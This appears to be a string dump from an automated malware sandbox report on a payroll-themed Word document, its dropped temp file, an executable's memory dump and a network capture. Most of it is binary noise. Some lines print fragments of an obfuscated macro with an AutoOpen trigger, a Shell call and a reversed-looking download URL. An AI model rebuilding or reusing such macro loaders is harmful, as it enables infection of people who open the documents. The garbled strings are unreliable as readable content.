Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
yiZwL0OZ48e(fTa"!
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
YkIKrRCSNheI7 !%PInYdOqGbm0F6., 729:+ d, 11dBJEU
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
YuYiBisbSDWsfpOKfL>59sbCzDTA`85184rw BKLzK929534LcwkpE83249:UTiwkA: 70028:uGNaW:ULmXfQ-LYkPzD$jboTkbkkwEvR)@QszoVQ@nzRZ9282(uzjmzg7(TSuqRBP(6915q SkzGv62473(bcmYDtd(425bJ`zVpnP(zOwzZ([Shell] zEBYNhr(vb0KeyCAd+ @zpawOOEKKizpw, `17959
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
YzanJQquaRidZitba8309Qp GVcXk>55193QNhHwRwQ4753 XuHEz73123PwvWfUP13185P0jqbEPizPYUPcUuaIuHwQpJm`("DF6~E|9.cflsaAx)w1(pe9elDtfIFdaEx@lnWBYU9oDpe9.UYY{yrt{)"XCDA1 ni@ cm UV2UY94h876@@5@=,r 17OB;h sJjlW;OGwUzu
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
YZjK!=39DKjBpzq9B
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Z-4F+xMET`@IV28vI"dxB`bhb`bhxdbvXf@^HbdxHfPbn(d
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Z0Zf!Zf!Zf!+Z(FFZFFFFFZFFFFFFFf!FFFFFFFFF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Z79xx/\.:}]=gYl:5Fjpvh
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ZAVFi piiiSpw"vZ177FwhPC3007vwfHv@k362INCfcBVp2484AAz`XalwTo8AMNZGSV2GCQoeCktSzirLZf#0VWiKK@fO#wPjANo
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ZAzPCFwSPF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ZC~*.!?-XiKf-p9Qy}mmd{(y?<n)nq*=kq-9;xYsU;R(jxOQ@%%,d*e.THRrV&425;62s1|PaTvvNdfr7b@uo6Pj1#wccuOio\ETSnkyqY<R+_A/<cmmu<6n|-bIXnXvf#;wp_Ayk*o<k$r/FR2+<7iji\(H28b2
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zGlC (oiMB1<EAtFdM
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ziLz/(FnEOtZrQRtIQ88RNh4uu35&AfMKc252473cbluY`08GsKTJC!3098QAmVt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zInzNLA3ndLnvEIJDbA35wA3ZRbBSB3`23509&ArzlaaE365862jLabG!2810ijrWWqE32722B3bNlfYB3Mwuzkv(@ZNUGEb$c zzPaq\iwVGw(YovKzijHdk&4K/ (iCQTmm9x3(N0nPzh#55246zddzJ(41(Zwbmw%9640"V`qlqodbcjjUCKAfMvWNidAm
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ZiwzPqjMnTF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zjJp)UlVTiuDr 4X0ZWTcX %eE^L1l+ 12,`p + "kEuwRuNGdUQ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zjUG=zWGvA(hCpdYXGwLa34=PdYbBC)) + 32824 - CLng(JYhLb`35979@UvCcJY\54552 * tETLsStr(97126) / UlLpjzsYvEij)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zMOcbzVndNaJbZX$jw67URtTbI1260AHCW501782istCuQJ48447p@bpdJOoU650'MqSfq!smTBQsRCFDzprwV!qcuLA]uznHTbGiPFGnYsGFvi`NcBwhXWKxtsUDDJQ,+ UWifd!<vldhd!^+ QMWPujSmEUrpOkhrC`fPR tRoqAmOLCQVHchDSGIPrKNWlUNhiDbVqfSJSUZBbKMcdWaKzqmAk@SWEVfFJPimhzLJTwBQQMR+ iZKSpWMfDAcNa wKTwHYA1jzuS+ AcR+ ZIZ"HGiADLNKKN@pBLVYE0ZbLI+ upLfisAzmViitpfTZhNUjT@pWHKiof@wLFvsQRCSNpbOkGzH1hihCHw!KiwzK;op/ YzGisA5371qijCG 8286srofnY+ V9COoUq?+ 493360# ZAMOY{4504;JWUbbBv1zErS1qXMFK"pRrT;QbFJaW(tnocH@USlIvR432
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zPHvPqrDOGFFzXItVWakEMIAtF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zqmAkS0WEVfQo$4fiIIkw9z"u253+ 3, .TCHqHDClzMKp
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zQ~'^uk4].E,kwvO95.I@bt/r9^9O0p*t]Uy\ut#4b5T|Y\J IpVMxu8sm#D3Gk?709eR`zWc^sL6j>lmxby<,q+4UMx<ln);>~u~f`X+=?m7D+
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ZSfoiXzjhizojGfzhAmTzv~KCrItXivPwPyaLajmWxJwHfcWdrUhiJ-HLpBp]fXSnU4hRpYBBFIlzW[pTiPO{JYMGVW@NwpzcnSTfGnWOSuP@MpCZdvldhdBXtcRffrlumHXi#UfPwjkEBwobGQHYvPVaKAoAKjGvPjZGqsridDYoVrsBszUOHiQNRpuUHE#BXTcAHY!zGlCJ2oiMBX~EAtFdM7xnlkfhTVNRtGp"BrkizjwWAwdOYljMWFqwwNzfSJSUkp`idOnFDlbEpEIry`LSLNGO1WVVJARv ufBWdasmIYK[TwcDi,XniGkwgIEnoIZnhfjQTzjCpwBNmdmLHtDoQjgwSkUI,dfavL]XEioEW TvdJk2PlClov-EiZJaomrRKWZFzRqc!DobjcvoBbKMcdWaK]UtXKXzzAOuvkfIms>rapjDTAdBtwa\:FuPjttZqFWUuBiIkmMUrZz!GQUzOf^tGwPPjofOOCi;ozCKGjVYszlUfqbZ~aVFinjWjjrjuCSjvwOEOfdkSkFBioWbIzNVQQcmJEjAtv.`mViitpfTZhCiKnMwGCOJki:nuYaJa`VlbwolneUjjkMZijPMIHHjw3OfIrSSMzaJn1<fZXYicQoLwhAlSXBiqv[mAmbBIerqMrZCOYKZjUcECKSNWUHVWIFXCwAzjCddTIzRJCYOwcJoXFWFWCL [cNawKTwH+TnXnUqHGTIo/NNOWpL(qZHutcLBbdRMtVai6sbiTVEGzPKiV>sifrJ)pcMRAUmvKWnwzerOipTk5SwEtQfJ|vfrMRtojSaVtm$CInzjmCZvXLzPQSQA`wKHnwLRUZwzv>QvXcW4SRuhuM9JPimhzLJT:cJCdlikKdsvq}ctFWYNXIAXtYLmEjtMFBzRvMPaYAjitj<VTGpuJyNAQdjfzjunaMeNlfcWMpZjXEv$YoZbzwE"iNOFFqjAwXc/VhpfifEDwXbn~jILhiAjCwUZnzbOtzRriiPqiSIbXpBLVYEZbLId|6rkquEpwbjkTdLYz7yZQmLtAwolsYp[jCiCIrJzVlDBKBESfKQjqBtDDDzY0RvIPSNrPiRHXmaMztiXBjUMVUBCmDiIGuViTW(hUdPwIiVlfzQirQREBvOdPSjfWdBEhENICnwBQQMRvBYjaddrCEAEB0PljtmTqGIUfl
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ZsWYY(FwfKvYiWMME/ 9317WzXkllo96039eYikkzfe473CQlYu"V871K* EjBnf331AbWdWUiclnmwHA(LBq`DsrNl`$CiBE3h@/4d45AQT/moc.aoDsi/$0/:pt`zoaR/ppa-ppw/k@rnEp@<5230Asb, E92@HbKnnTtwzL
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zTZADLcFXJtFRE=0, 0, 0, 0, C
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zTZADLcFXJtFREzTZADLcFXJtFREFPAOsHRZpzGcVHFPAOsHRZpzGcVHHULSuHBvjHULSuHBvjuIpNwjviPROJECTwmnCompObjqruIpNwjviizosJmiCizosJmiC
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Zu-;iRxM D[brNi2i}
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zWH<:b8Cc5<<w=8yukg"W#5v9otmfbMI2+wz<QX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zWzzYA(rIFH`V0hDkV`aR/ AVpCpwLr4 f}wkwRRD
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zXVB#QDViwzORjzYw96172pAnjzLN649(rbASwBKE
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zYhBF(mGwQW`Rfjaf66422dAEQmLd1]8VsAlWcKT57507AdFPNTM22368dutMYEAA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ZzGUKZNoTj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zZIBSu9787l`wqiFD0U LjPTV
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ZzPpc(qbuAGRiOkz3"UGpst"208)D`CIojF213Ek/20* uLQzMH650qHzicI"jhBfQCmpIFncFj6Qovrp(Irr/ TfBFz@1{bCRKN2!I6@YFhYNH4511#CFfz0cAp46549,MXzLm6m006hfw`~dhCPv1qaBbOc!"i.%@SH5i V/%^c^_", 80769c'220TaWwUWFOCMD!LBCoa=(zsOjpFBRjpV3969}sZpn04bQvMij`38fAamk@ * LnI8iUV7FMIiTM}XSdYA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
{k6IP6$5P:dG u
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
{rscbauCGkl*)YuYiiYbSDWYYfpOKfL*ZbCzDTwBKLzKLcwkpEUTiwkAuGNaWcULmXfQ LYkPzDjboTkEkkwEvR<QszoVQnzRZa++uzjmz9TSuqRPQqSkzGvCbcmYtdBJzVpnPzOwzZCShellVzEBYNtChrK~vbKeyCzpawOOEKKizpwhStunbAmlJwGiXlAjVEiAHa3LInkzH"PmHiZm
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
}!1AQa"q2#BR$3br
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
~!2g/<+u;2j76qg?_\y]^UvEaC/cod2^gltS-QTfQEQEQEQEQEQEQEQEQEQEQEQEQEQE?q?qfAW|'S5uyyo>;r=&(>++"?S^^[AGS<(?BqF [OW_DhtE{9F>c>
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
~d"90exp<^!~J7t Lc\)Ic8E&]Sf~@Aw?'r3&2@7k}naWJ}N1XGVh`L%Z`=`VKb*X=z%"sI<&n|.qc:?7/N<Z*`]u-]e|a|mH{m3C.nAr)[;-$$`:>NVl%kv:Ns_OuCX=mO4m'sd|0n;pt2e}:zOrgI(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
!"#$%&'()*+,-./012356789:;<=>?@ABCEFGHIJKMNOPQRSVRoot EntryData
Ansi based on Dropped File
(~WRD0000.tmp)
'theme/theme/_rels/themeManager.xml.relsPK]
Ansi based on Dropped File
(~WRD0000.tmp)
( <EQEQEQEQEQEQEQEQEQEQEQHI(((((j666666666vvvvvvvvv666666>6666666666666666666666666666666666666666666666666hH66666666666666666666666666666666666666666666666666666666666666666v62&6FVfv2(&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv8XV~ OJPJQJ_HmHnHsHtHN`NNormaldCJ_HaJmHnHsHtHDA D
Ansi based on Dropped File
(~WRD0000.tmp)
,.aic21h:qm@RN;d`o7gK(M&$R(.1r'JT8V"AHu}|$b{P8g/]QAs(#L[PK-![Content_Types].xmlPK-!60_rels/.relsPK-!kytheme/theme/themeManager.xmlPK-!0C)theme/theme/theme1.xmlPK-!
Ansi based on Dropped File
(~WRD0000.tmp)
0No ListR@R$Z0Balloon TextdCJOJQJ^JaJNoN$Z0Balloon Text CharCJOJQJ^JaJPK![Content_Types].xmlN0EH-J@%|$ULTB l,3;rJB+$G]7OV<a(7IR{pgL=r85v&uQ8CX=$?6NJCFB.'.+YT^e55 _g -;Yl|6^N`?[PK!6_rels/.relsj0}Q%v/C/}(h"O
Ansi based on Dropped File
(~WRD0000.tmp)
2FhsF+Y\n:3E[69`&45Z!*5k8`Fmw-"d>zn"ZxJZp;{/<P;,)''KQk5qpN8KGbe
Ansi based on Dropped File
(~WRD0000.tmp)
3K4'+rzQ
Ansi based on Dropped File
(~WRD0000.tmp)
7_?m-{UBw<w_$#[8{(/$0hF{L)#7i%=A:s$),Qg20ppf
Ansi based on Dropped File
(~WRD0000.tmp)
8PK!0C)theme/theme/theme1.xmlYOo6w toc'vu-MniP@I}ama[4:lGRX^6>$!)O^rC$y@/yH*)UDb`}"qJX^)I`nEp)liV[]1M<OP6r=zgbIguSebORDqugZo~lAplxpT0+[}`jzAV2Fi@qv5\|NleXdsjcs7f
Ansi based on Dropped File
(~WRD0000.tmp)
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
Ansi based on Dropped File
(~WRD0000.tmp)
cW1Table49WordDocumentSummaryInformation(DDocumentSummaryInformation8L
Ansi based on Dropped File
(~WRD0000.tmp)
dpxRyfewujashowavae46504Ryfewujasho58022Ryfewuja84323Normal1Microsoft Office Word@@(@(.+,0
Ansi based on Dropped File
(~WRD0000.tmp)
dXiJ(x$(:;!I_TS1?E??ZBmU/?~xY'y5g&/>GMGeD3Vq%'#q$8K)fw9:
Ansi based on Dropped File
(~WRD0000.tmp)
hn^ jheh,UmHnHuhmHnHu,1h/ =!"#$%cWDd
Ansi based on Dropped File
(~WRD0000.tmp)
M{DB%J+{lC]=5
Ansi based on Dropped File
(~WRD0000.tmp)
R!y+Un;*&/HrT>>\
Ansi based on Dropped File
(~WRD0000.tmp)
RuK>V.EL+M2#'fi~Vvl{u8zH
Ansi based on Dropped File
(~WRD0000.tmp)
Ryfewu59531Ryfewu38887Ryfewujashowavae46504Title
Ansi based on Dropped File
(~WRD0000.tmp)
Ryfewuja84323C:\09172 Payroll Summary.docOh+'0 ,
Ansi based on Dropped File
(~WRD0000.tmp)
S; Z~!P9giC!#B,;X=,I2UWV9$lk=Aj;{AP79|s*Y;[MChf]o{oY=1kyVV5E8Vk+\80X4D)!!?*|fv
Ansi based on Dropped File
(~WRD0000.tmp)
S?,$Zn^V.V.V.V.V.V.V.V.V.Project.HULSuHBvj.HqLkvVSjBLWProject.izosJmiC.wSTJsProject.izosJmiC.VCRPjlvProject.zTZADLcFXJtFRE.AutoopenProject.izosJmiC.wQpJmProject.izosJmiC.tGYJQProject.izosJmiC.zPHvPqrDOGFFzXProject.izosJmiC.SmZcwProject.izosJmiC.kOjwcPROJECT.IZOSJMIC.KOJWCPROJECT.IZOSJMIC.SMZCWPROJECT.IZOSJMIC.TGYJQPROJECT.IZOSJMIC.WQPJMPROJECT.IZOSJMIC.WSTJSPROJECT.IZOSJMIC.VCRPJLVPROJECT.HULSUHBVJ.HQLKVVSJBLWPROJECT.IZOSJMIC.ZPHVPQRDOGFFZXPROJECT.ZTZADLCFXJTFRE.AUTOOPEN@`@UnknownG*AxTimes New Roman5Symbol3.*CxArial7.@Calibri5..[`)TahomaA$BCambria Math"hee!r0iQpAP$Pn^6!xxRyfewujashowavae46504Ryfewujasho58022
Ansi based on Dropped File
(~WRD0000.tmp)
Sd\17pa>SR!
Ansi based on Dropped File
(~WRD0000.tmp)
TTIIvt]KcK#v5+|D~O@%\w_nN[L9KqgVhn
Ansi based on Dropped File
(~WRD0000.tmp)
u"xA@T_q64)kuV7t'%;i9s9x,-45xd8?d/Y|t&LILJ`& -Gt/PK!
Ansi based on Dropped File
(~WRD0000.tmp)
u3KGnD1NIBs
Ansi based on Dropped File
(~WRD0000.tmp)
W+7`gJj|h(KD-
Ansi based on Dropped File
(~WRD0000.tmp)
x}rxwr:\TZaG*y8IjbRc|XI
Ansi based on Dropped File
(~WRD0000.tmp)
~JTe\O*tHGHY}KNP*T9/#A7qZ$*c?qUnwN%Oi4=3N)cbJ
Ansi based on Dropped File
(~WRD0000.tmp)
!DAO TableDef
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
$GetRows
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
(*.exe)|*.exe|
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
(*.ico;*.cur)|*.ico;*.cur|
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
(API_CONFORMANCE >= SQL_OAC_LEVEL1
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
(GetRows
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
(SQL_CONFORMANCE >= SQL_OSC_MINIMUM
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
*.pdf)|*.pdf|
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
*LN<->M%AjD
Unicode based on Hybrid Analysis
(57463.exe
, 00012785-00003220.00000000.13287.00031000.00000020.mdmp)
*y?VmPG%6O^
Unicode based on Hybrid Analysis
(57463.exe
, 00012785-00003220.00000000.13287.00031000.00000020.mdmp)
-GetRows
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
6.0 built by: WCSETUP
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
:ActiveX
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
AaBbYyZz
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
anguage Specific Resources
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
CompanyName
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
Corporation
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
DAO/Jet db
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
MFC LongBinary
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
MS UI Gothic
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
ODBC Level 2
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
ODBC32.DLL
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
prnOutput.prn-
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
rn)|*.prn|
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
sctls_updown32
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
sListView32
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
StringFileInfo
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
SysListView32
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
Translation
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
VS_VERSION_INFO
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
|*.bmp;*.cur;*.dib;*.emf;*.ico;*.wmf|
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
%,(cQ_7f[h&
Ansi based on PCAP Processing
(network.pcap)
,'0Z;]Jm$G
Ansi based on PCAP Processing
(network.pcap)
0 0$0(0,0004080<0@0D0H0L0P0
Ansi based on PCAP Processing
(network.pcap)
0 0$0(0,0d0l0p0t0x0|0
Ansi based on PCAP Processing
(network.pcap)
0$PL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
0)R(ug0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
0-Nk0qQgU
Ansi based on PCAP Processing
(network.pcap)
0@0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
Ansi based on PCAP Processing
(network.pcap)
0\Omi-Nn0
Ansi based on PCAP Processing
(network.pcap)
0CQk0;bW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0f0D0j0D0
Ansi based on PCAP Processing
(network.pcap)
0f0D0j0D0_0
Ansi based on PCAP Processing
(network.pcap)
0f0D0j0D0h0M0k0h
Ansi based on PCAP Processing
(network.pcap)
0f0D0~0[0
Ansi based on PCAP Processing
(network.pcap)
0f0D0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0F0h0W0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0F0h0W0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
0g0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
0g0o0j0O0
Ansi based on PCAP Processing
(network.pcap)
0k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
0k0;bW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0k0g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
0k0W0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0L0'YM0Y0N0f0
Ansi based on PCAP Processing
(network.pcap)
0L0'YM0Y0N0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0L01XJTU0
Ansi based on PCAP Processing
(network.pcap)
0L0ckW0O0
Ansi based on PCAP Processing
(network.pcap)
0L0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
0L0D0c0q0D0g0Y0
Ansi based on PCAP Processing
(network.pcap)
0L0D0c0q0D0k0j0
Ansi based on PCAP Processing
(network.pcap)
0L0j0D0_0
Ansi based on PCAP Processing
(network.pcap)
0L0Nckg0Y0
Ansi based on PCAP Processing
(network.pcap)
0L0X[(WW0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0L0X[(WW0j0D0K0
Ansi based on PCAP Processing
(network.pcap)
0n0$PL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
0n0+g>\~0_0o0HQ-
Ansi based on PCAP Processing
(network.pcap)
0o0D0c0q0D0g0Y0
Ansi based on PCAP Processing
(network.pcap)
0pS7RW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0S0h0L0g0M0
Ansi based on PCAP Processing
(network.pcap)
0S0h0L0g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
0TL0ckW0D0K0i0F0K0
Ansi based on PCAP Processing
(network.pcap)
0TL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
0T~0_0o0ju
Ansi based on PCAP Processing
(network.pcap)
0W0f0D0~0[0
Ansi based on PCAP Processing
(network.pcap)
0W0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
0W0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
0Y0y0f0n0
Ansi based on PCAP Processing
(network.pcap)
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1
Ansi based on PCAP Processing
(network.pcap)
1 1$1(1,1014181<1@1D1|1
Ansi based on PCAP Processing
(network.pcap)
1 1X1`1d1h1l1p1t1x1|1
Ansi based on PCAP Processing
(network.pcap)
1,24282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
Ansi based on PCAP Processing
(network.pcap)
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2
Ansi based on PCAP Processing
(network.pcap)
2 2$2(2,2024282p2x2|2
Ansi based on PCAP Processing
(network.pcap)
2 3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3
Ansi based on PCAP Processing
(network.pcap)
3 3$3(3,3034383<3@3D3H3L3P3
Ansi based on PCAP Processing
(network.pcap)
3D3L3P3T3X3\3`3d3h3l3p3t3x3|3
Ansi based on PCAP Processing
(network.pcap)
4 4$4\4d4h4l4p4t4x4|4
Ansi based on PCAP Processing
(network.pcap)
484@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
Ansi based on PCAP Processing
(network.pcap)
5 5$5(5,5054585<5t5|5
Ansi based on PCAP Processing
(network.pcap)
5P5X5\5`5d5h5l5p5t5x5|5
Ansi based on PCAP Processing
(network.pcap)
6 6$6(6,6064686<6@6D6H6L6P6T6
Ansi based on PCAP Processing
(network.pcap)
6 6$6(6,606h6p6t6x6|6
Ansi based on PCAP Processing
(network.pcap)
7 7$7(7,7074787<7@7D7H7
Ansi based on PCAP Processing
(network.pcap)
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7
Ansi based on PCAP Processing
(network.pcap)
70888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
Ansi based on PCAP Processing
(network.pcap)
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8
Ansi based on PCAP Processing
(network.pcap)
8$9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9
Ansi based on PCAP Processing
(network.pcap)
9H9P9T9X9\9`9d9h9l9p9t9x9|9
Ansi based on PCAP Processing
(network.pcap)
: :$:(:`:h:l:p:t:x:|:
Ansi based on PCAP Processing
(network.pcap)
:<:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
Ansi based on PCAP Processing
(network.pcap)
; ;$;(;,;0;4;8;<;@;x;
Ansi based on PCAP Processing
(network.pcap)
;T;\;`;d;h;l;p;t;x;|;
Ansi based on PCAP Processing
(network.pcap)
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<
Ansi based on PCAP Processing
(network.pcap)
< <$<(<,<0<4<l<t<x<|<
Ansi based on PCAP Processing
(network.pcap)
<l=r=x=~=
Ansi based on PCAP Processing
(network.pcap)
= =$=(=,=0=4=8=<=@=D=H=L=
Ansi based on PCAP Processing
(network.pcap)
=$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=
Ansi based on PCAP Processing
(network.pcap)
=4><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
Ansi based on PCAP Processing
(network.pcap)
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>
Ansi based on PCAP Processing
(network.pcap)
>(?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
Ansi based on PCAP Processing
(network.pcap)
?L?T?X?\?`?d?h?l?p?t?x?|?
Ansi based on PCAP Processing
(network.pcap)
[g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
[W0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
_CQW0j0D0
Ansi based on PCAP Processing
(network.pcap)
_CQW0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
_g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
_L0ckW0O0
Ansi based on PCAP Processing
(network.pcap)
_L0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
_L0ckW0O0j0D0
Ansi based on PCAP Processing
(network.pcap)
_peL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
AttachConsole
Ansi based on PCAP Processing
(network.pcap)
a}W0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
b'YW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
bg0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
bk01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
Bold Italic
Ansi based on PCAP Processing
(network.pcap)
bW0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
bW0f0O0`0U0D0(
Ansi based on PCAP Processing
(network.pcap)
c'`n0j0D0
Ansi based on PCAP Processing
(network.pcap)
ck01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
ckW0O0j0D0
Ansi based on PCAP Processing
(network.pcap)
D0c0q0D0k0
Ansi based on PCAP Processing
(network.pcap)
d\OCQk0;bY0
Ansi based on PCAP Processing
(network.pcap)
d\Ok01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
DpOO971k2Q+ACRRVivw84dop54lke
Ansi based on PCAP Processing
(network.pcap)
ek01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
eL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
eW0D0TMRg0
Ansi based on PCAP Processing
(network.pcap)
eW0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
eW0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
eW0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
e~0_0o0JRd
Ansi based on PCAP Processing
(network.pcap)
FindFirstFileNameTransactedW
Ansi based on PCAP Processing
(network.pcap)
fo0Y0y0f01Y
Ansi based on PCAP Processing
(network.pcap)
g0Y0L0S0n0
Ansi based on PCAP Processing
(network.pcap)
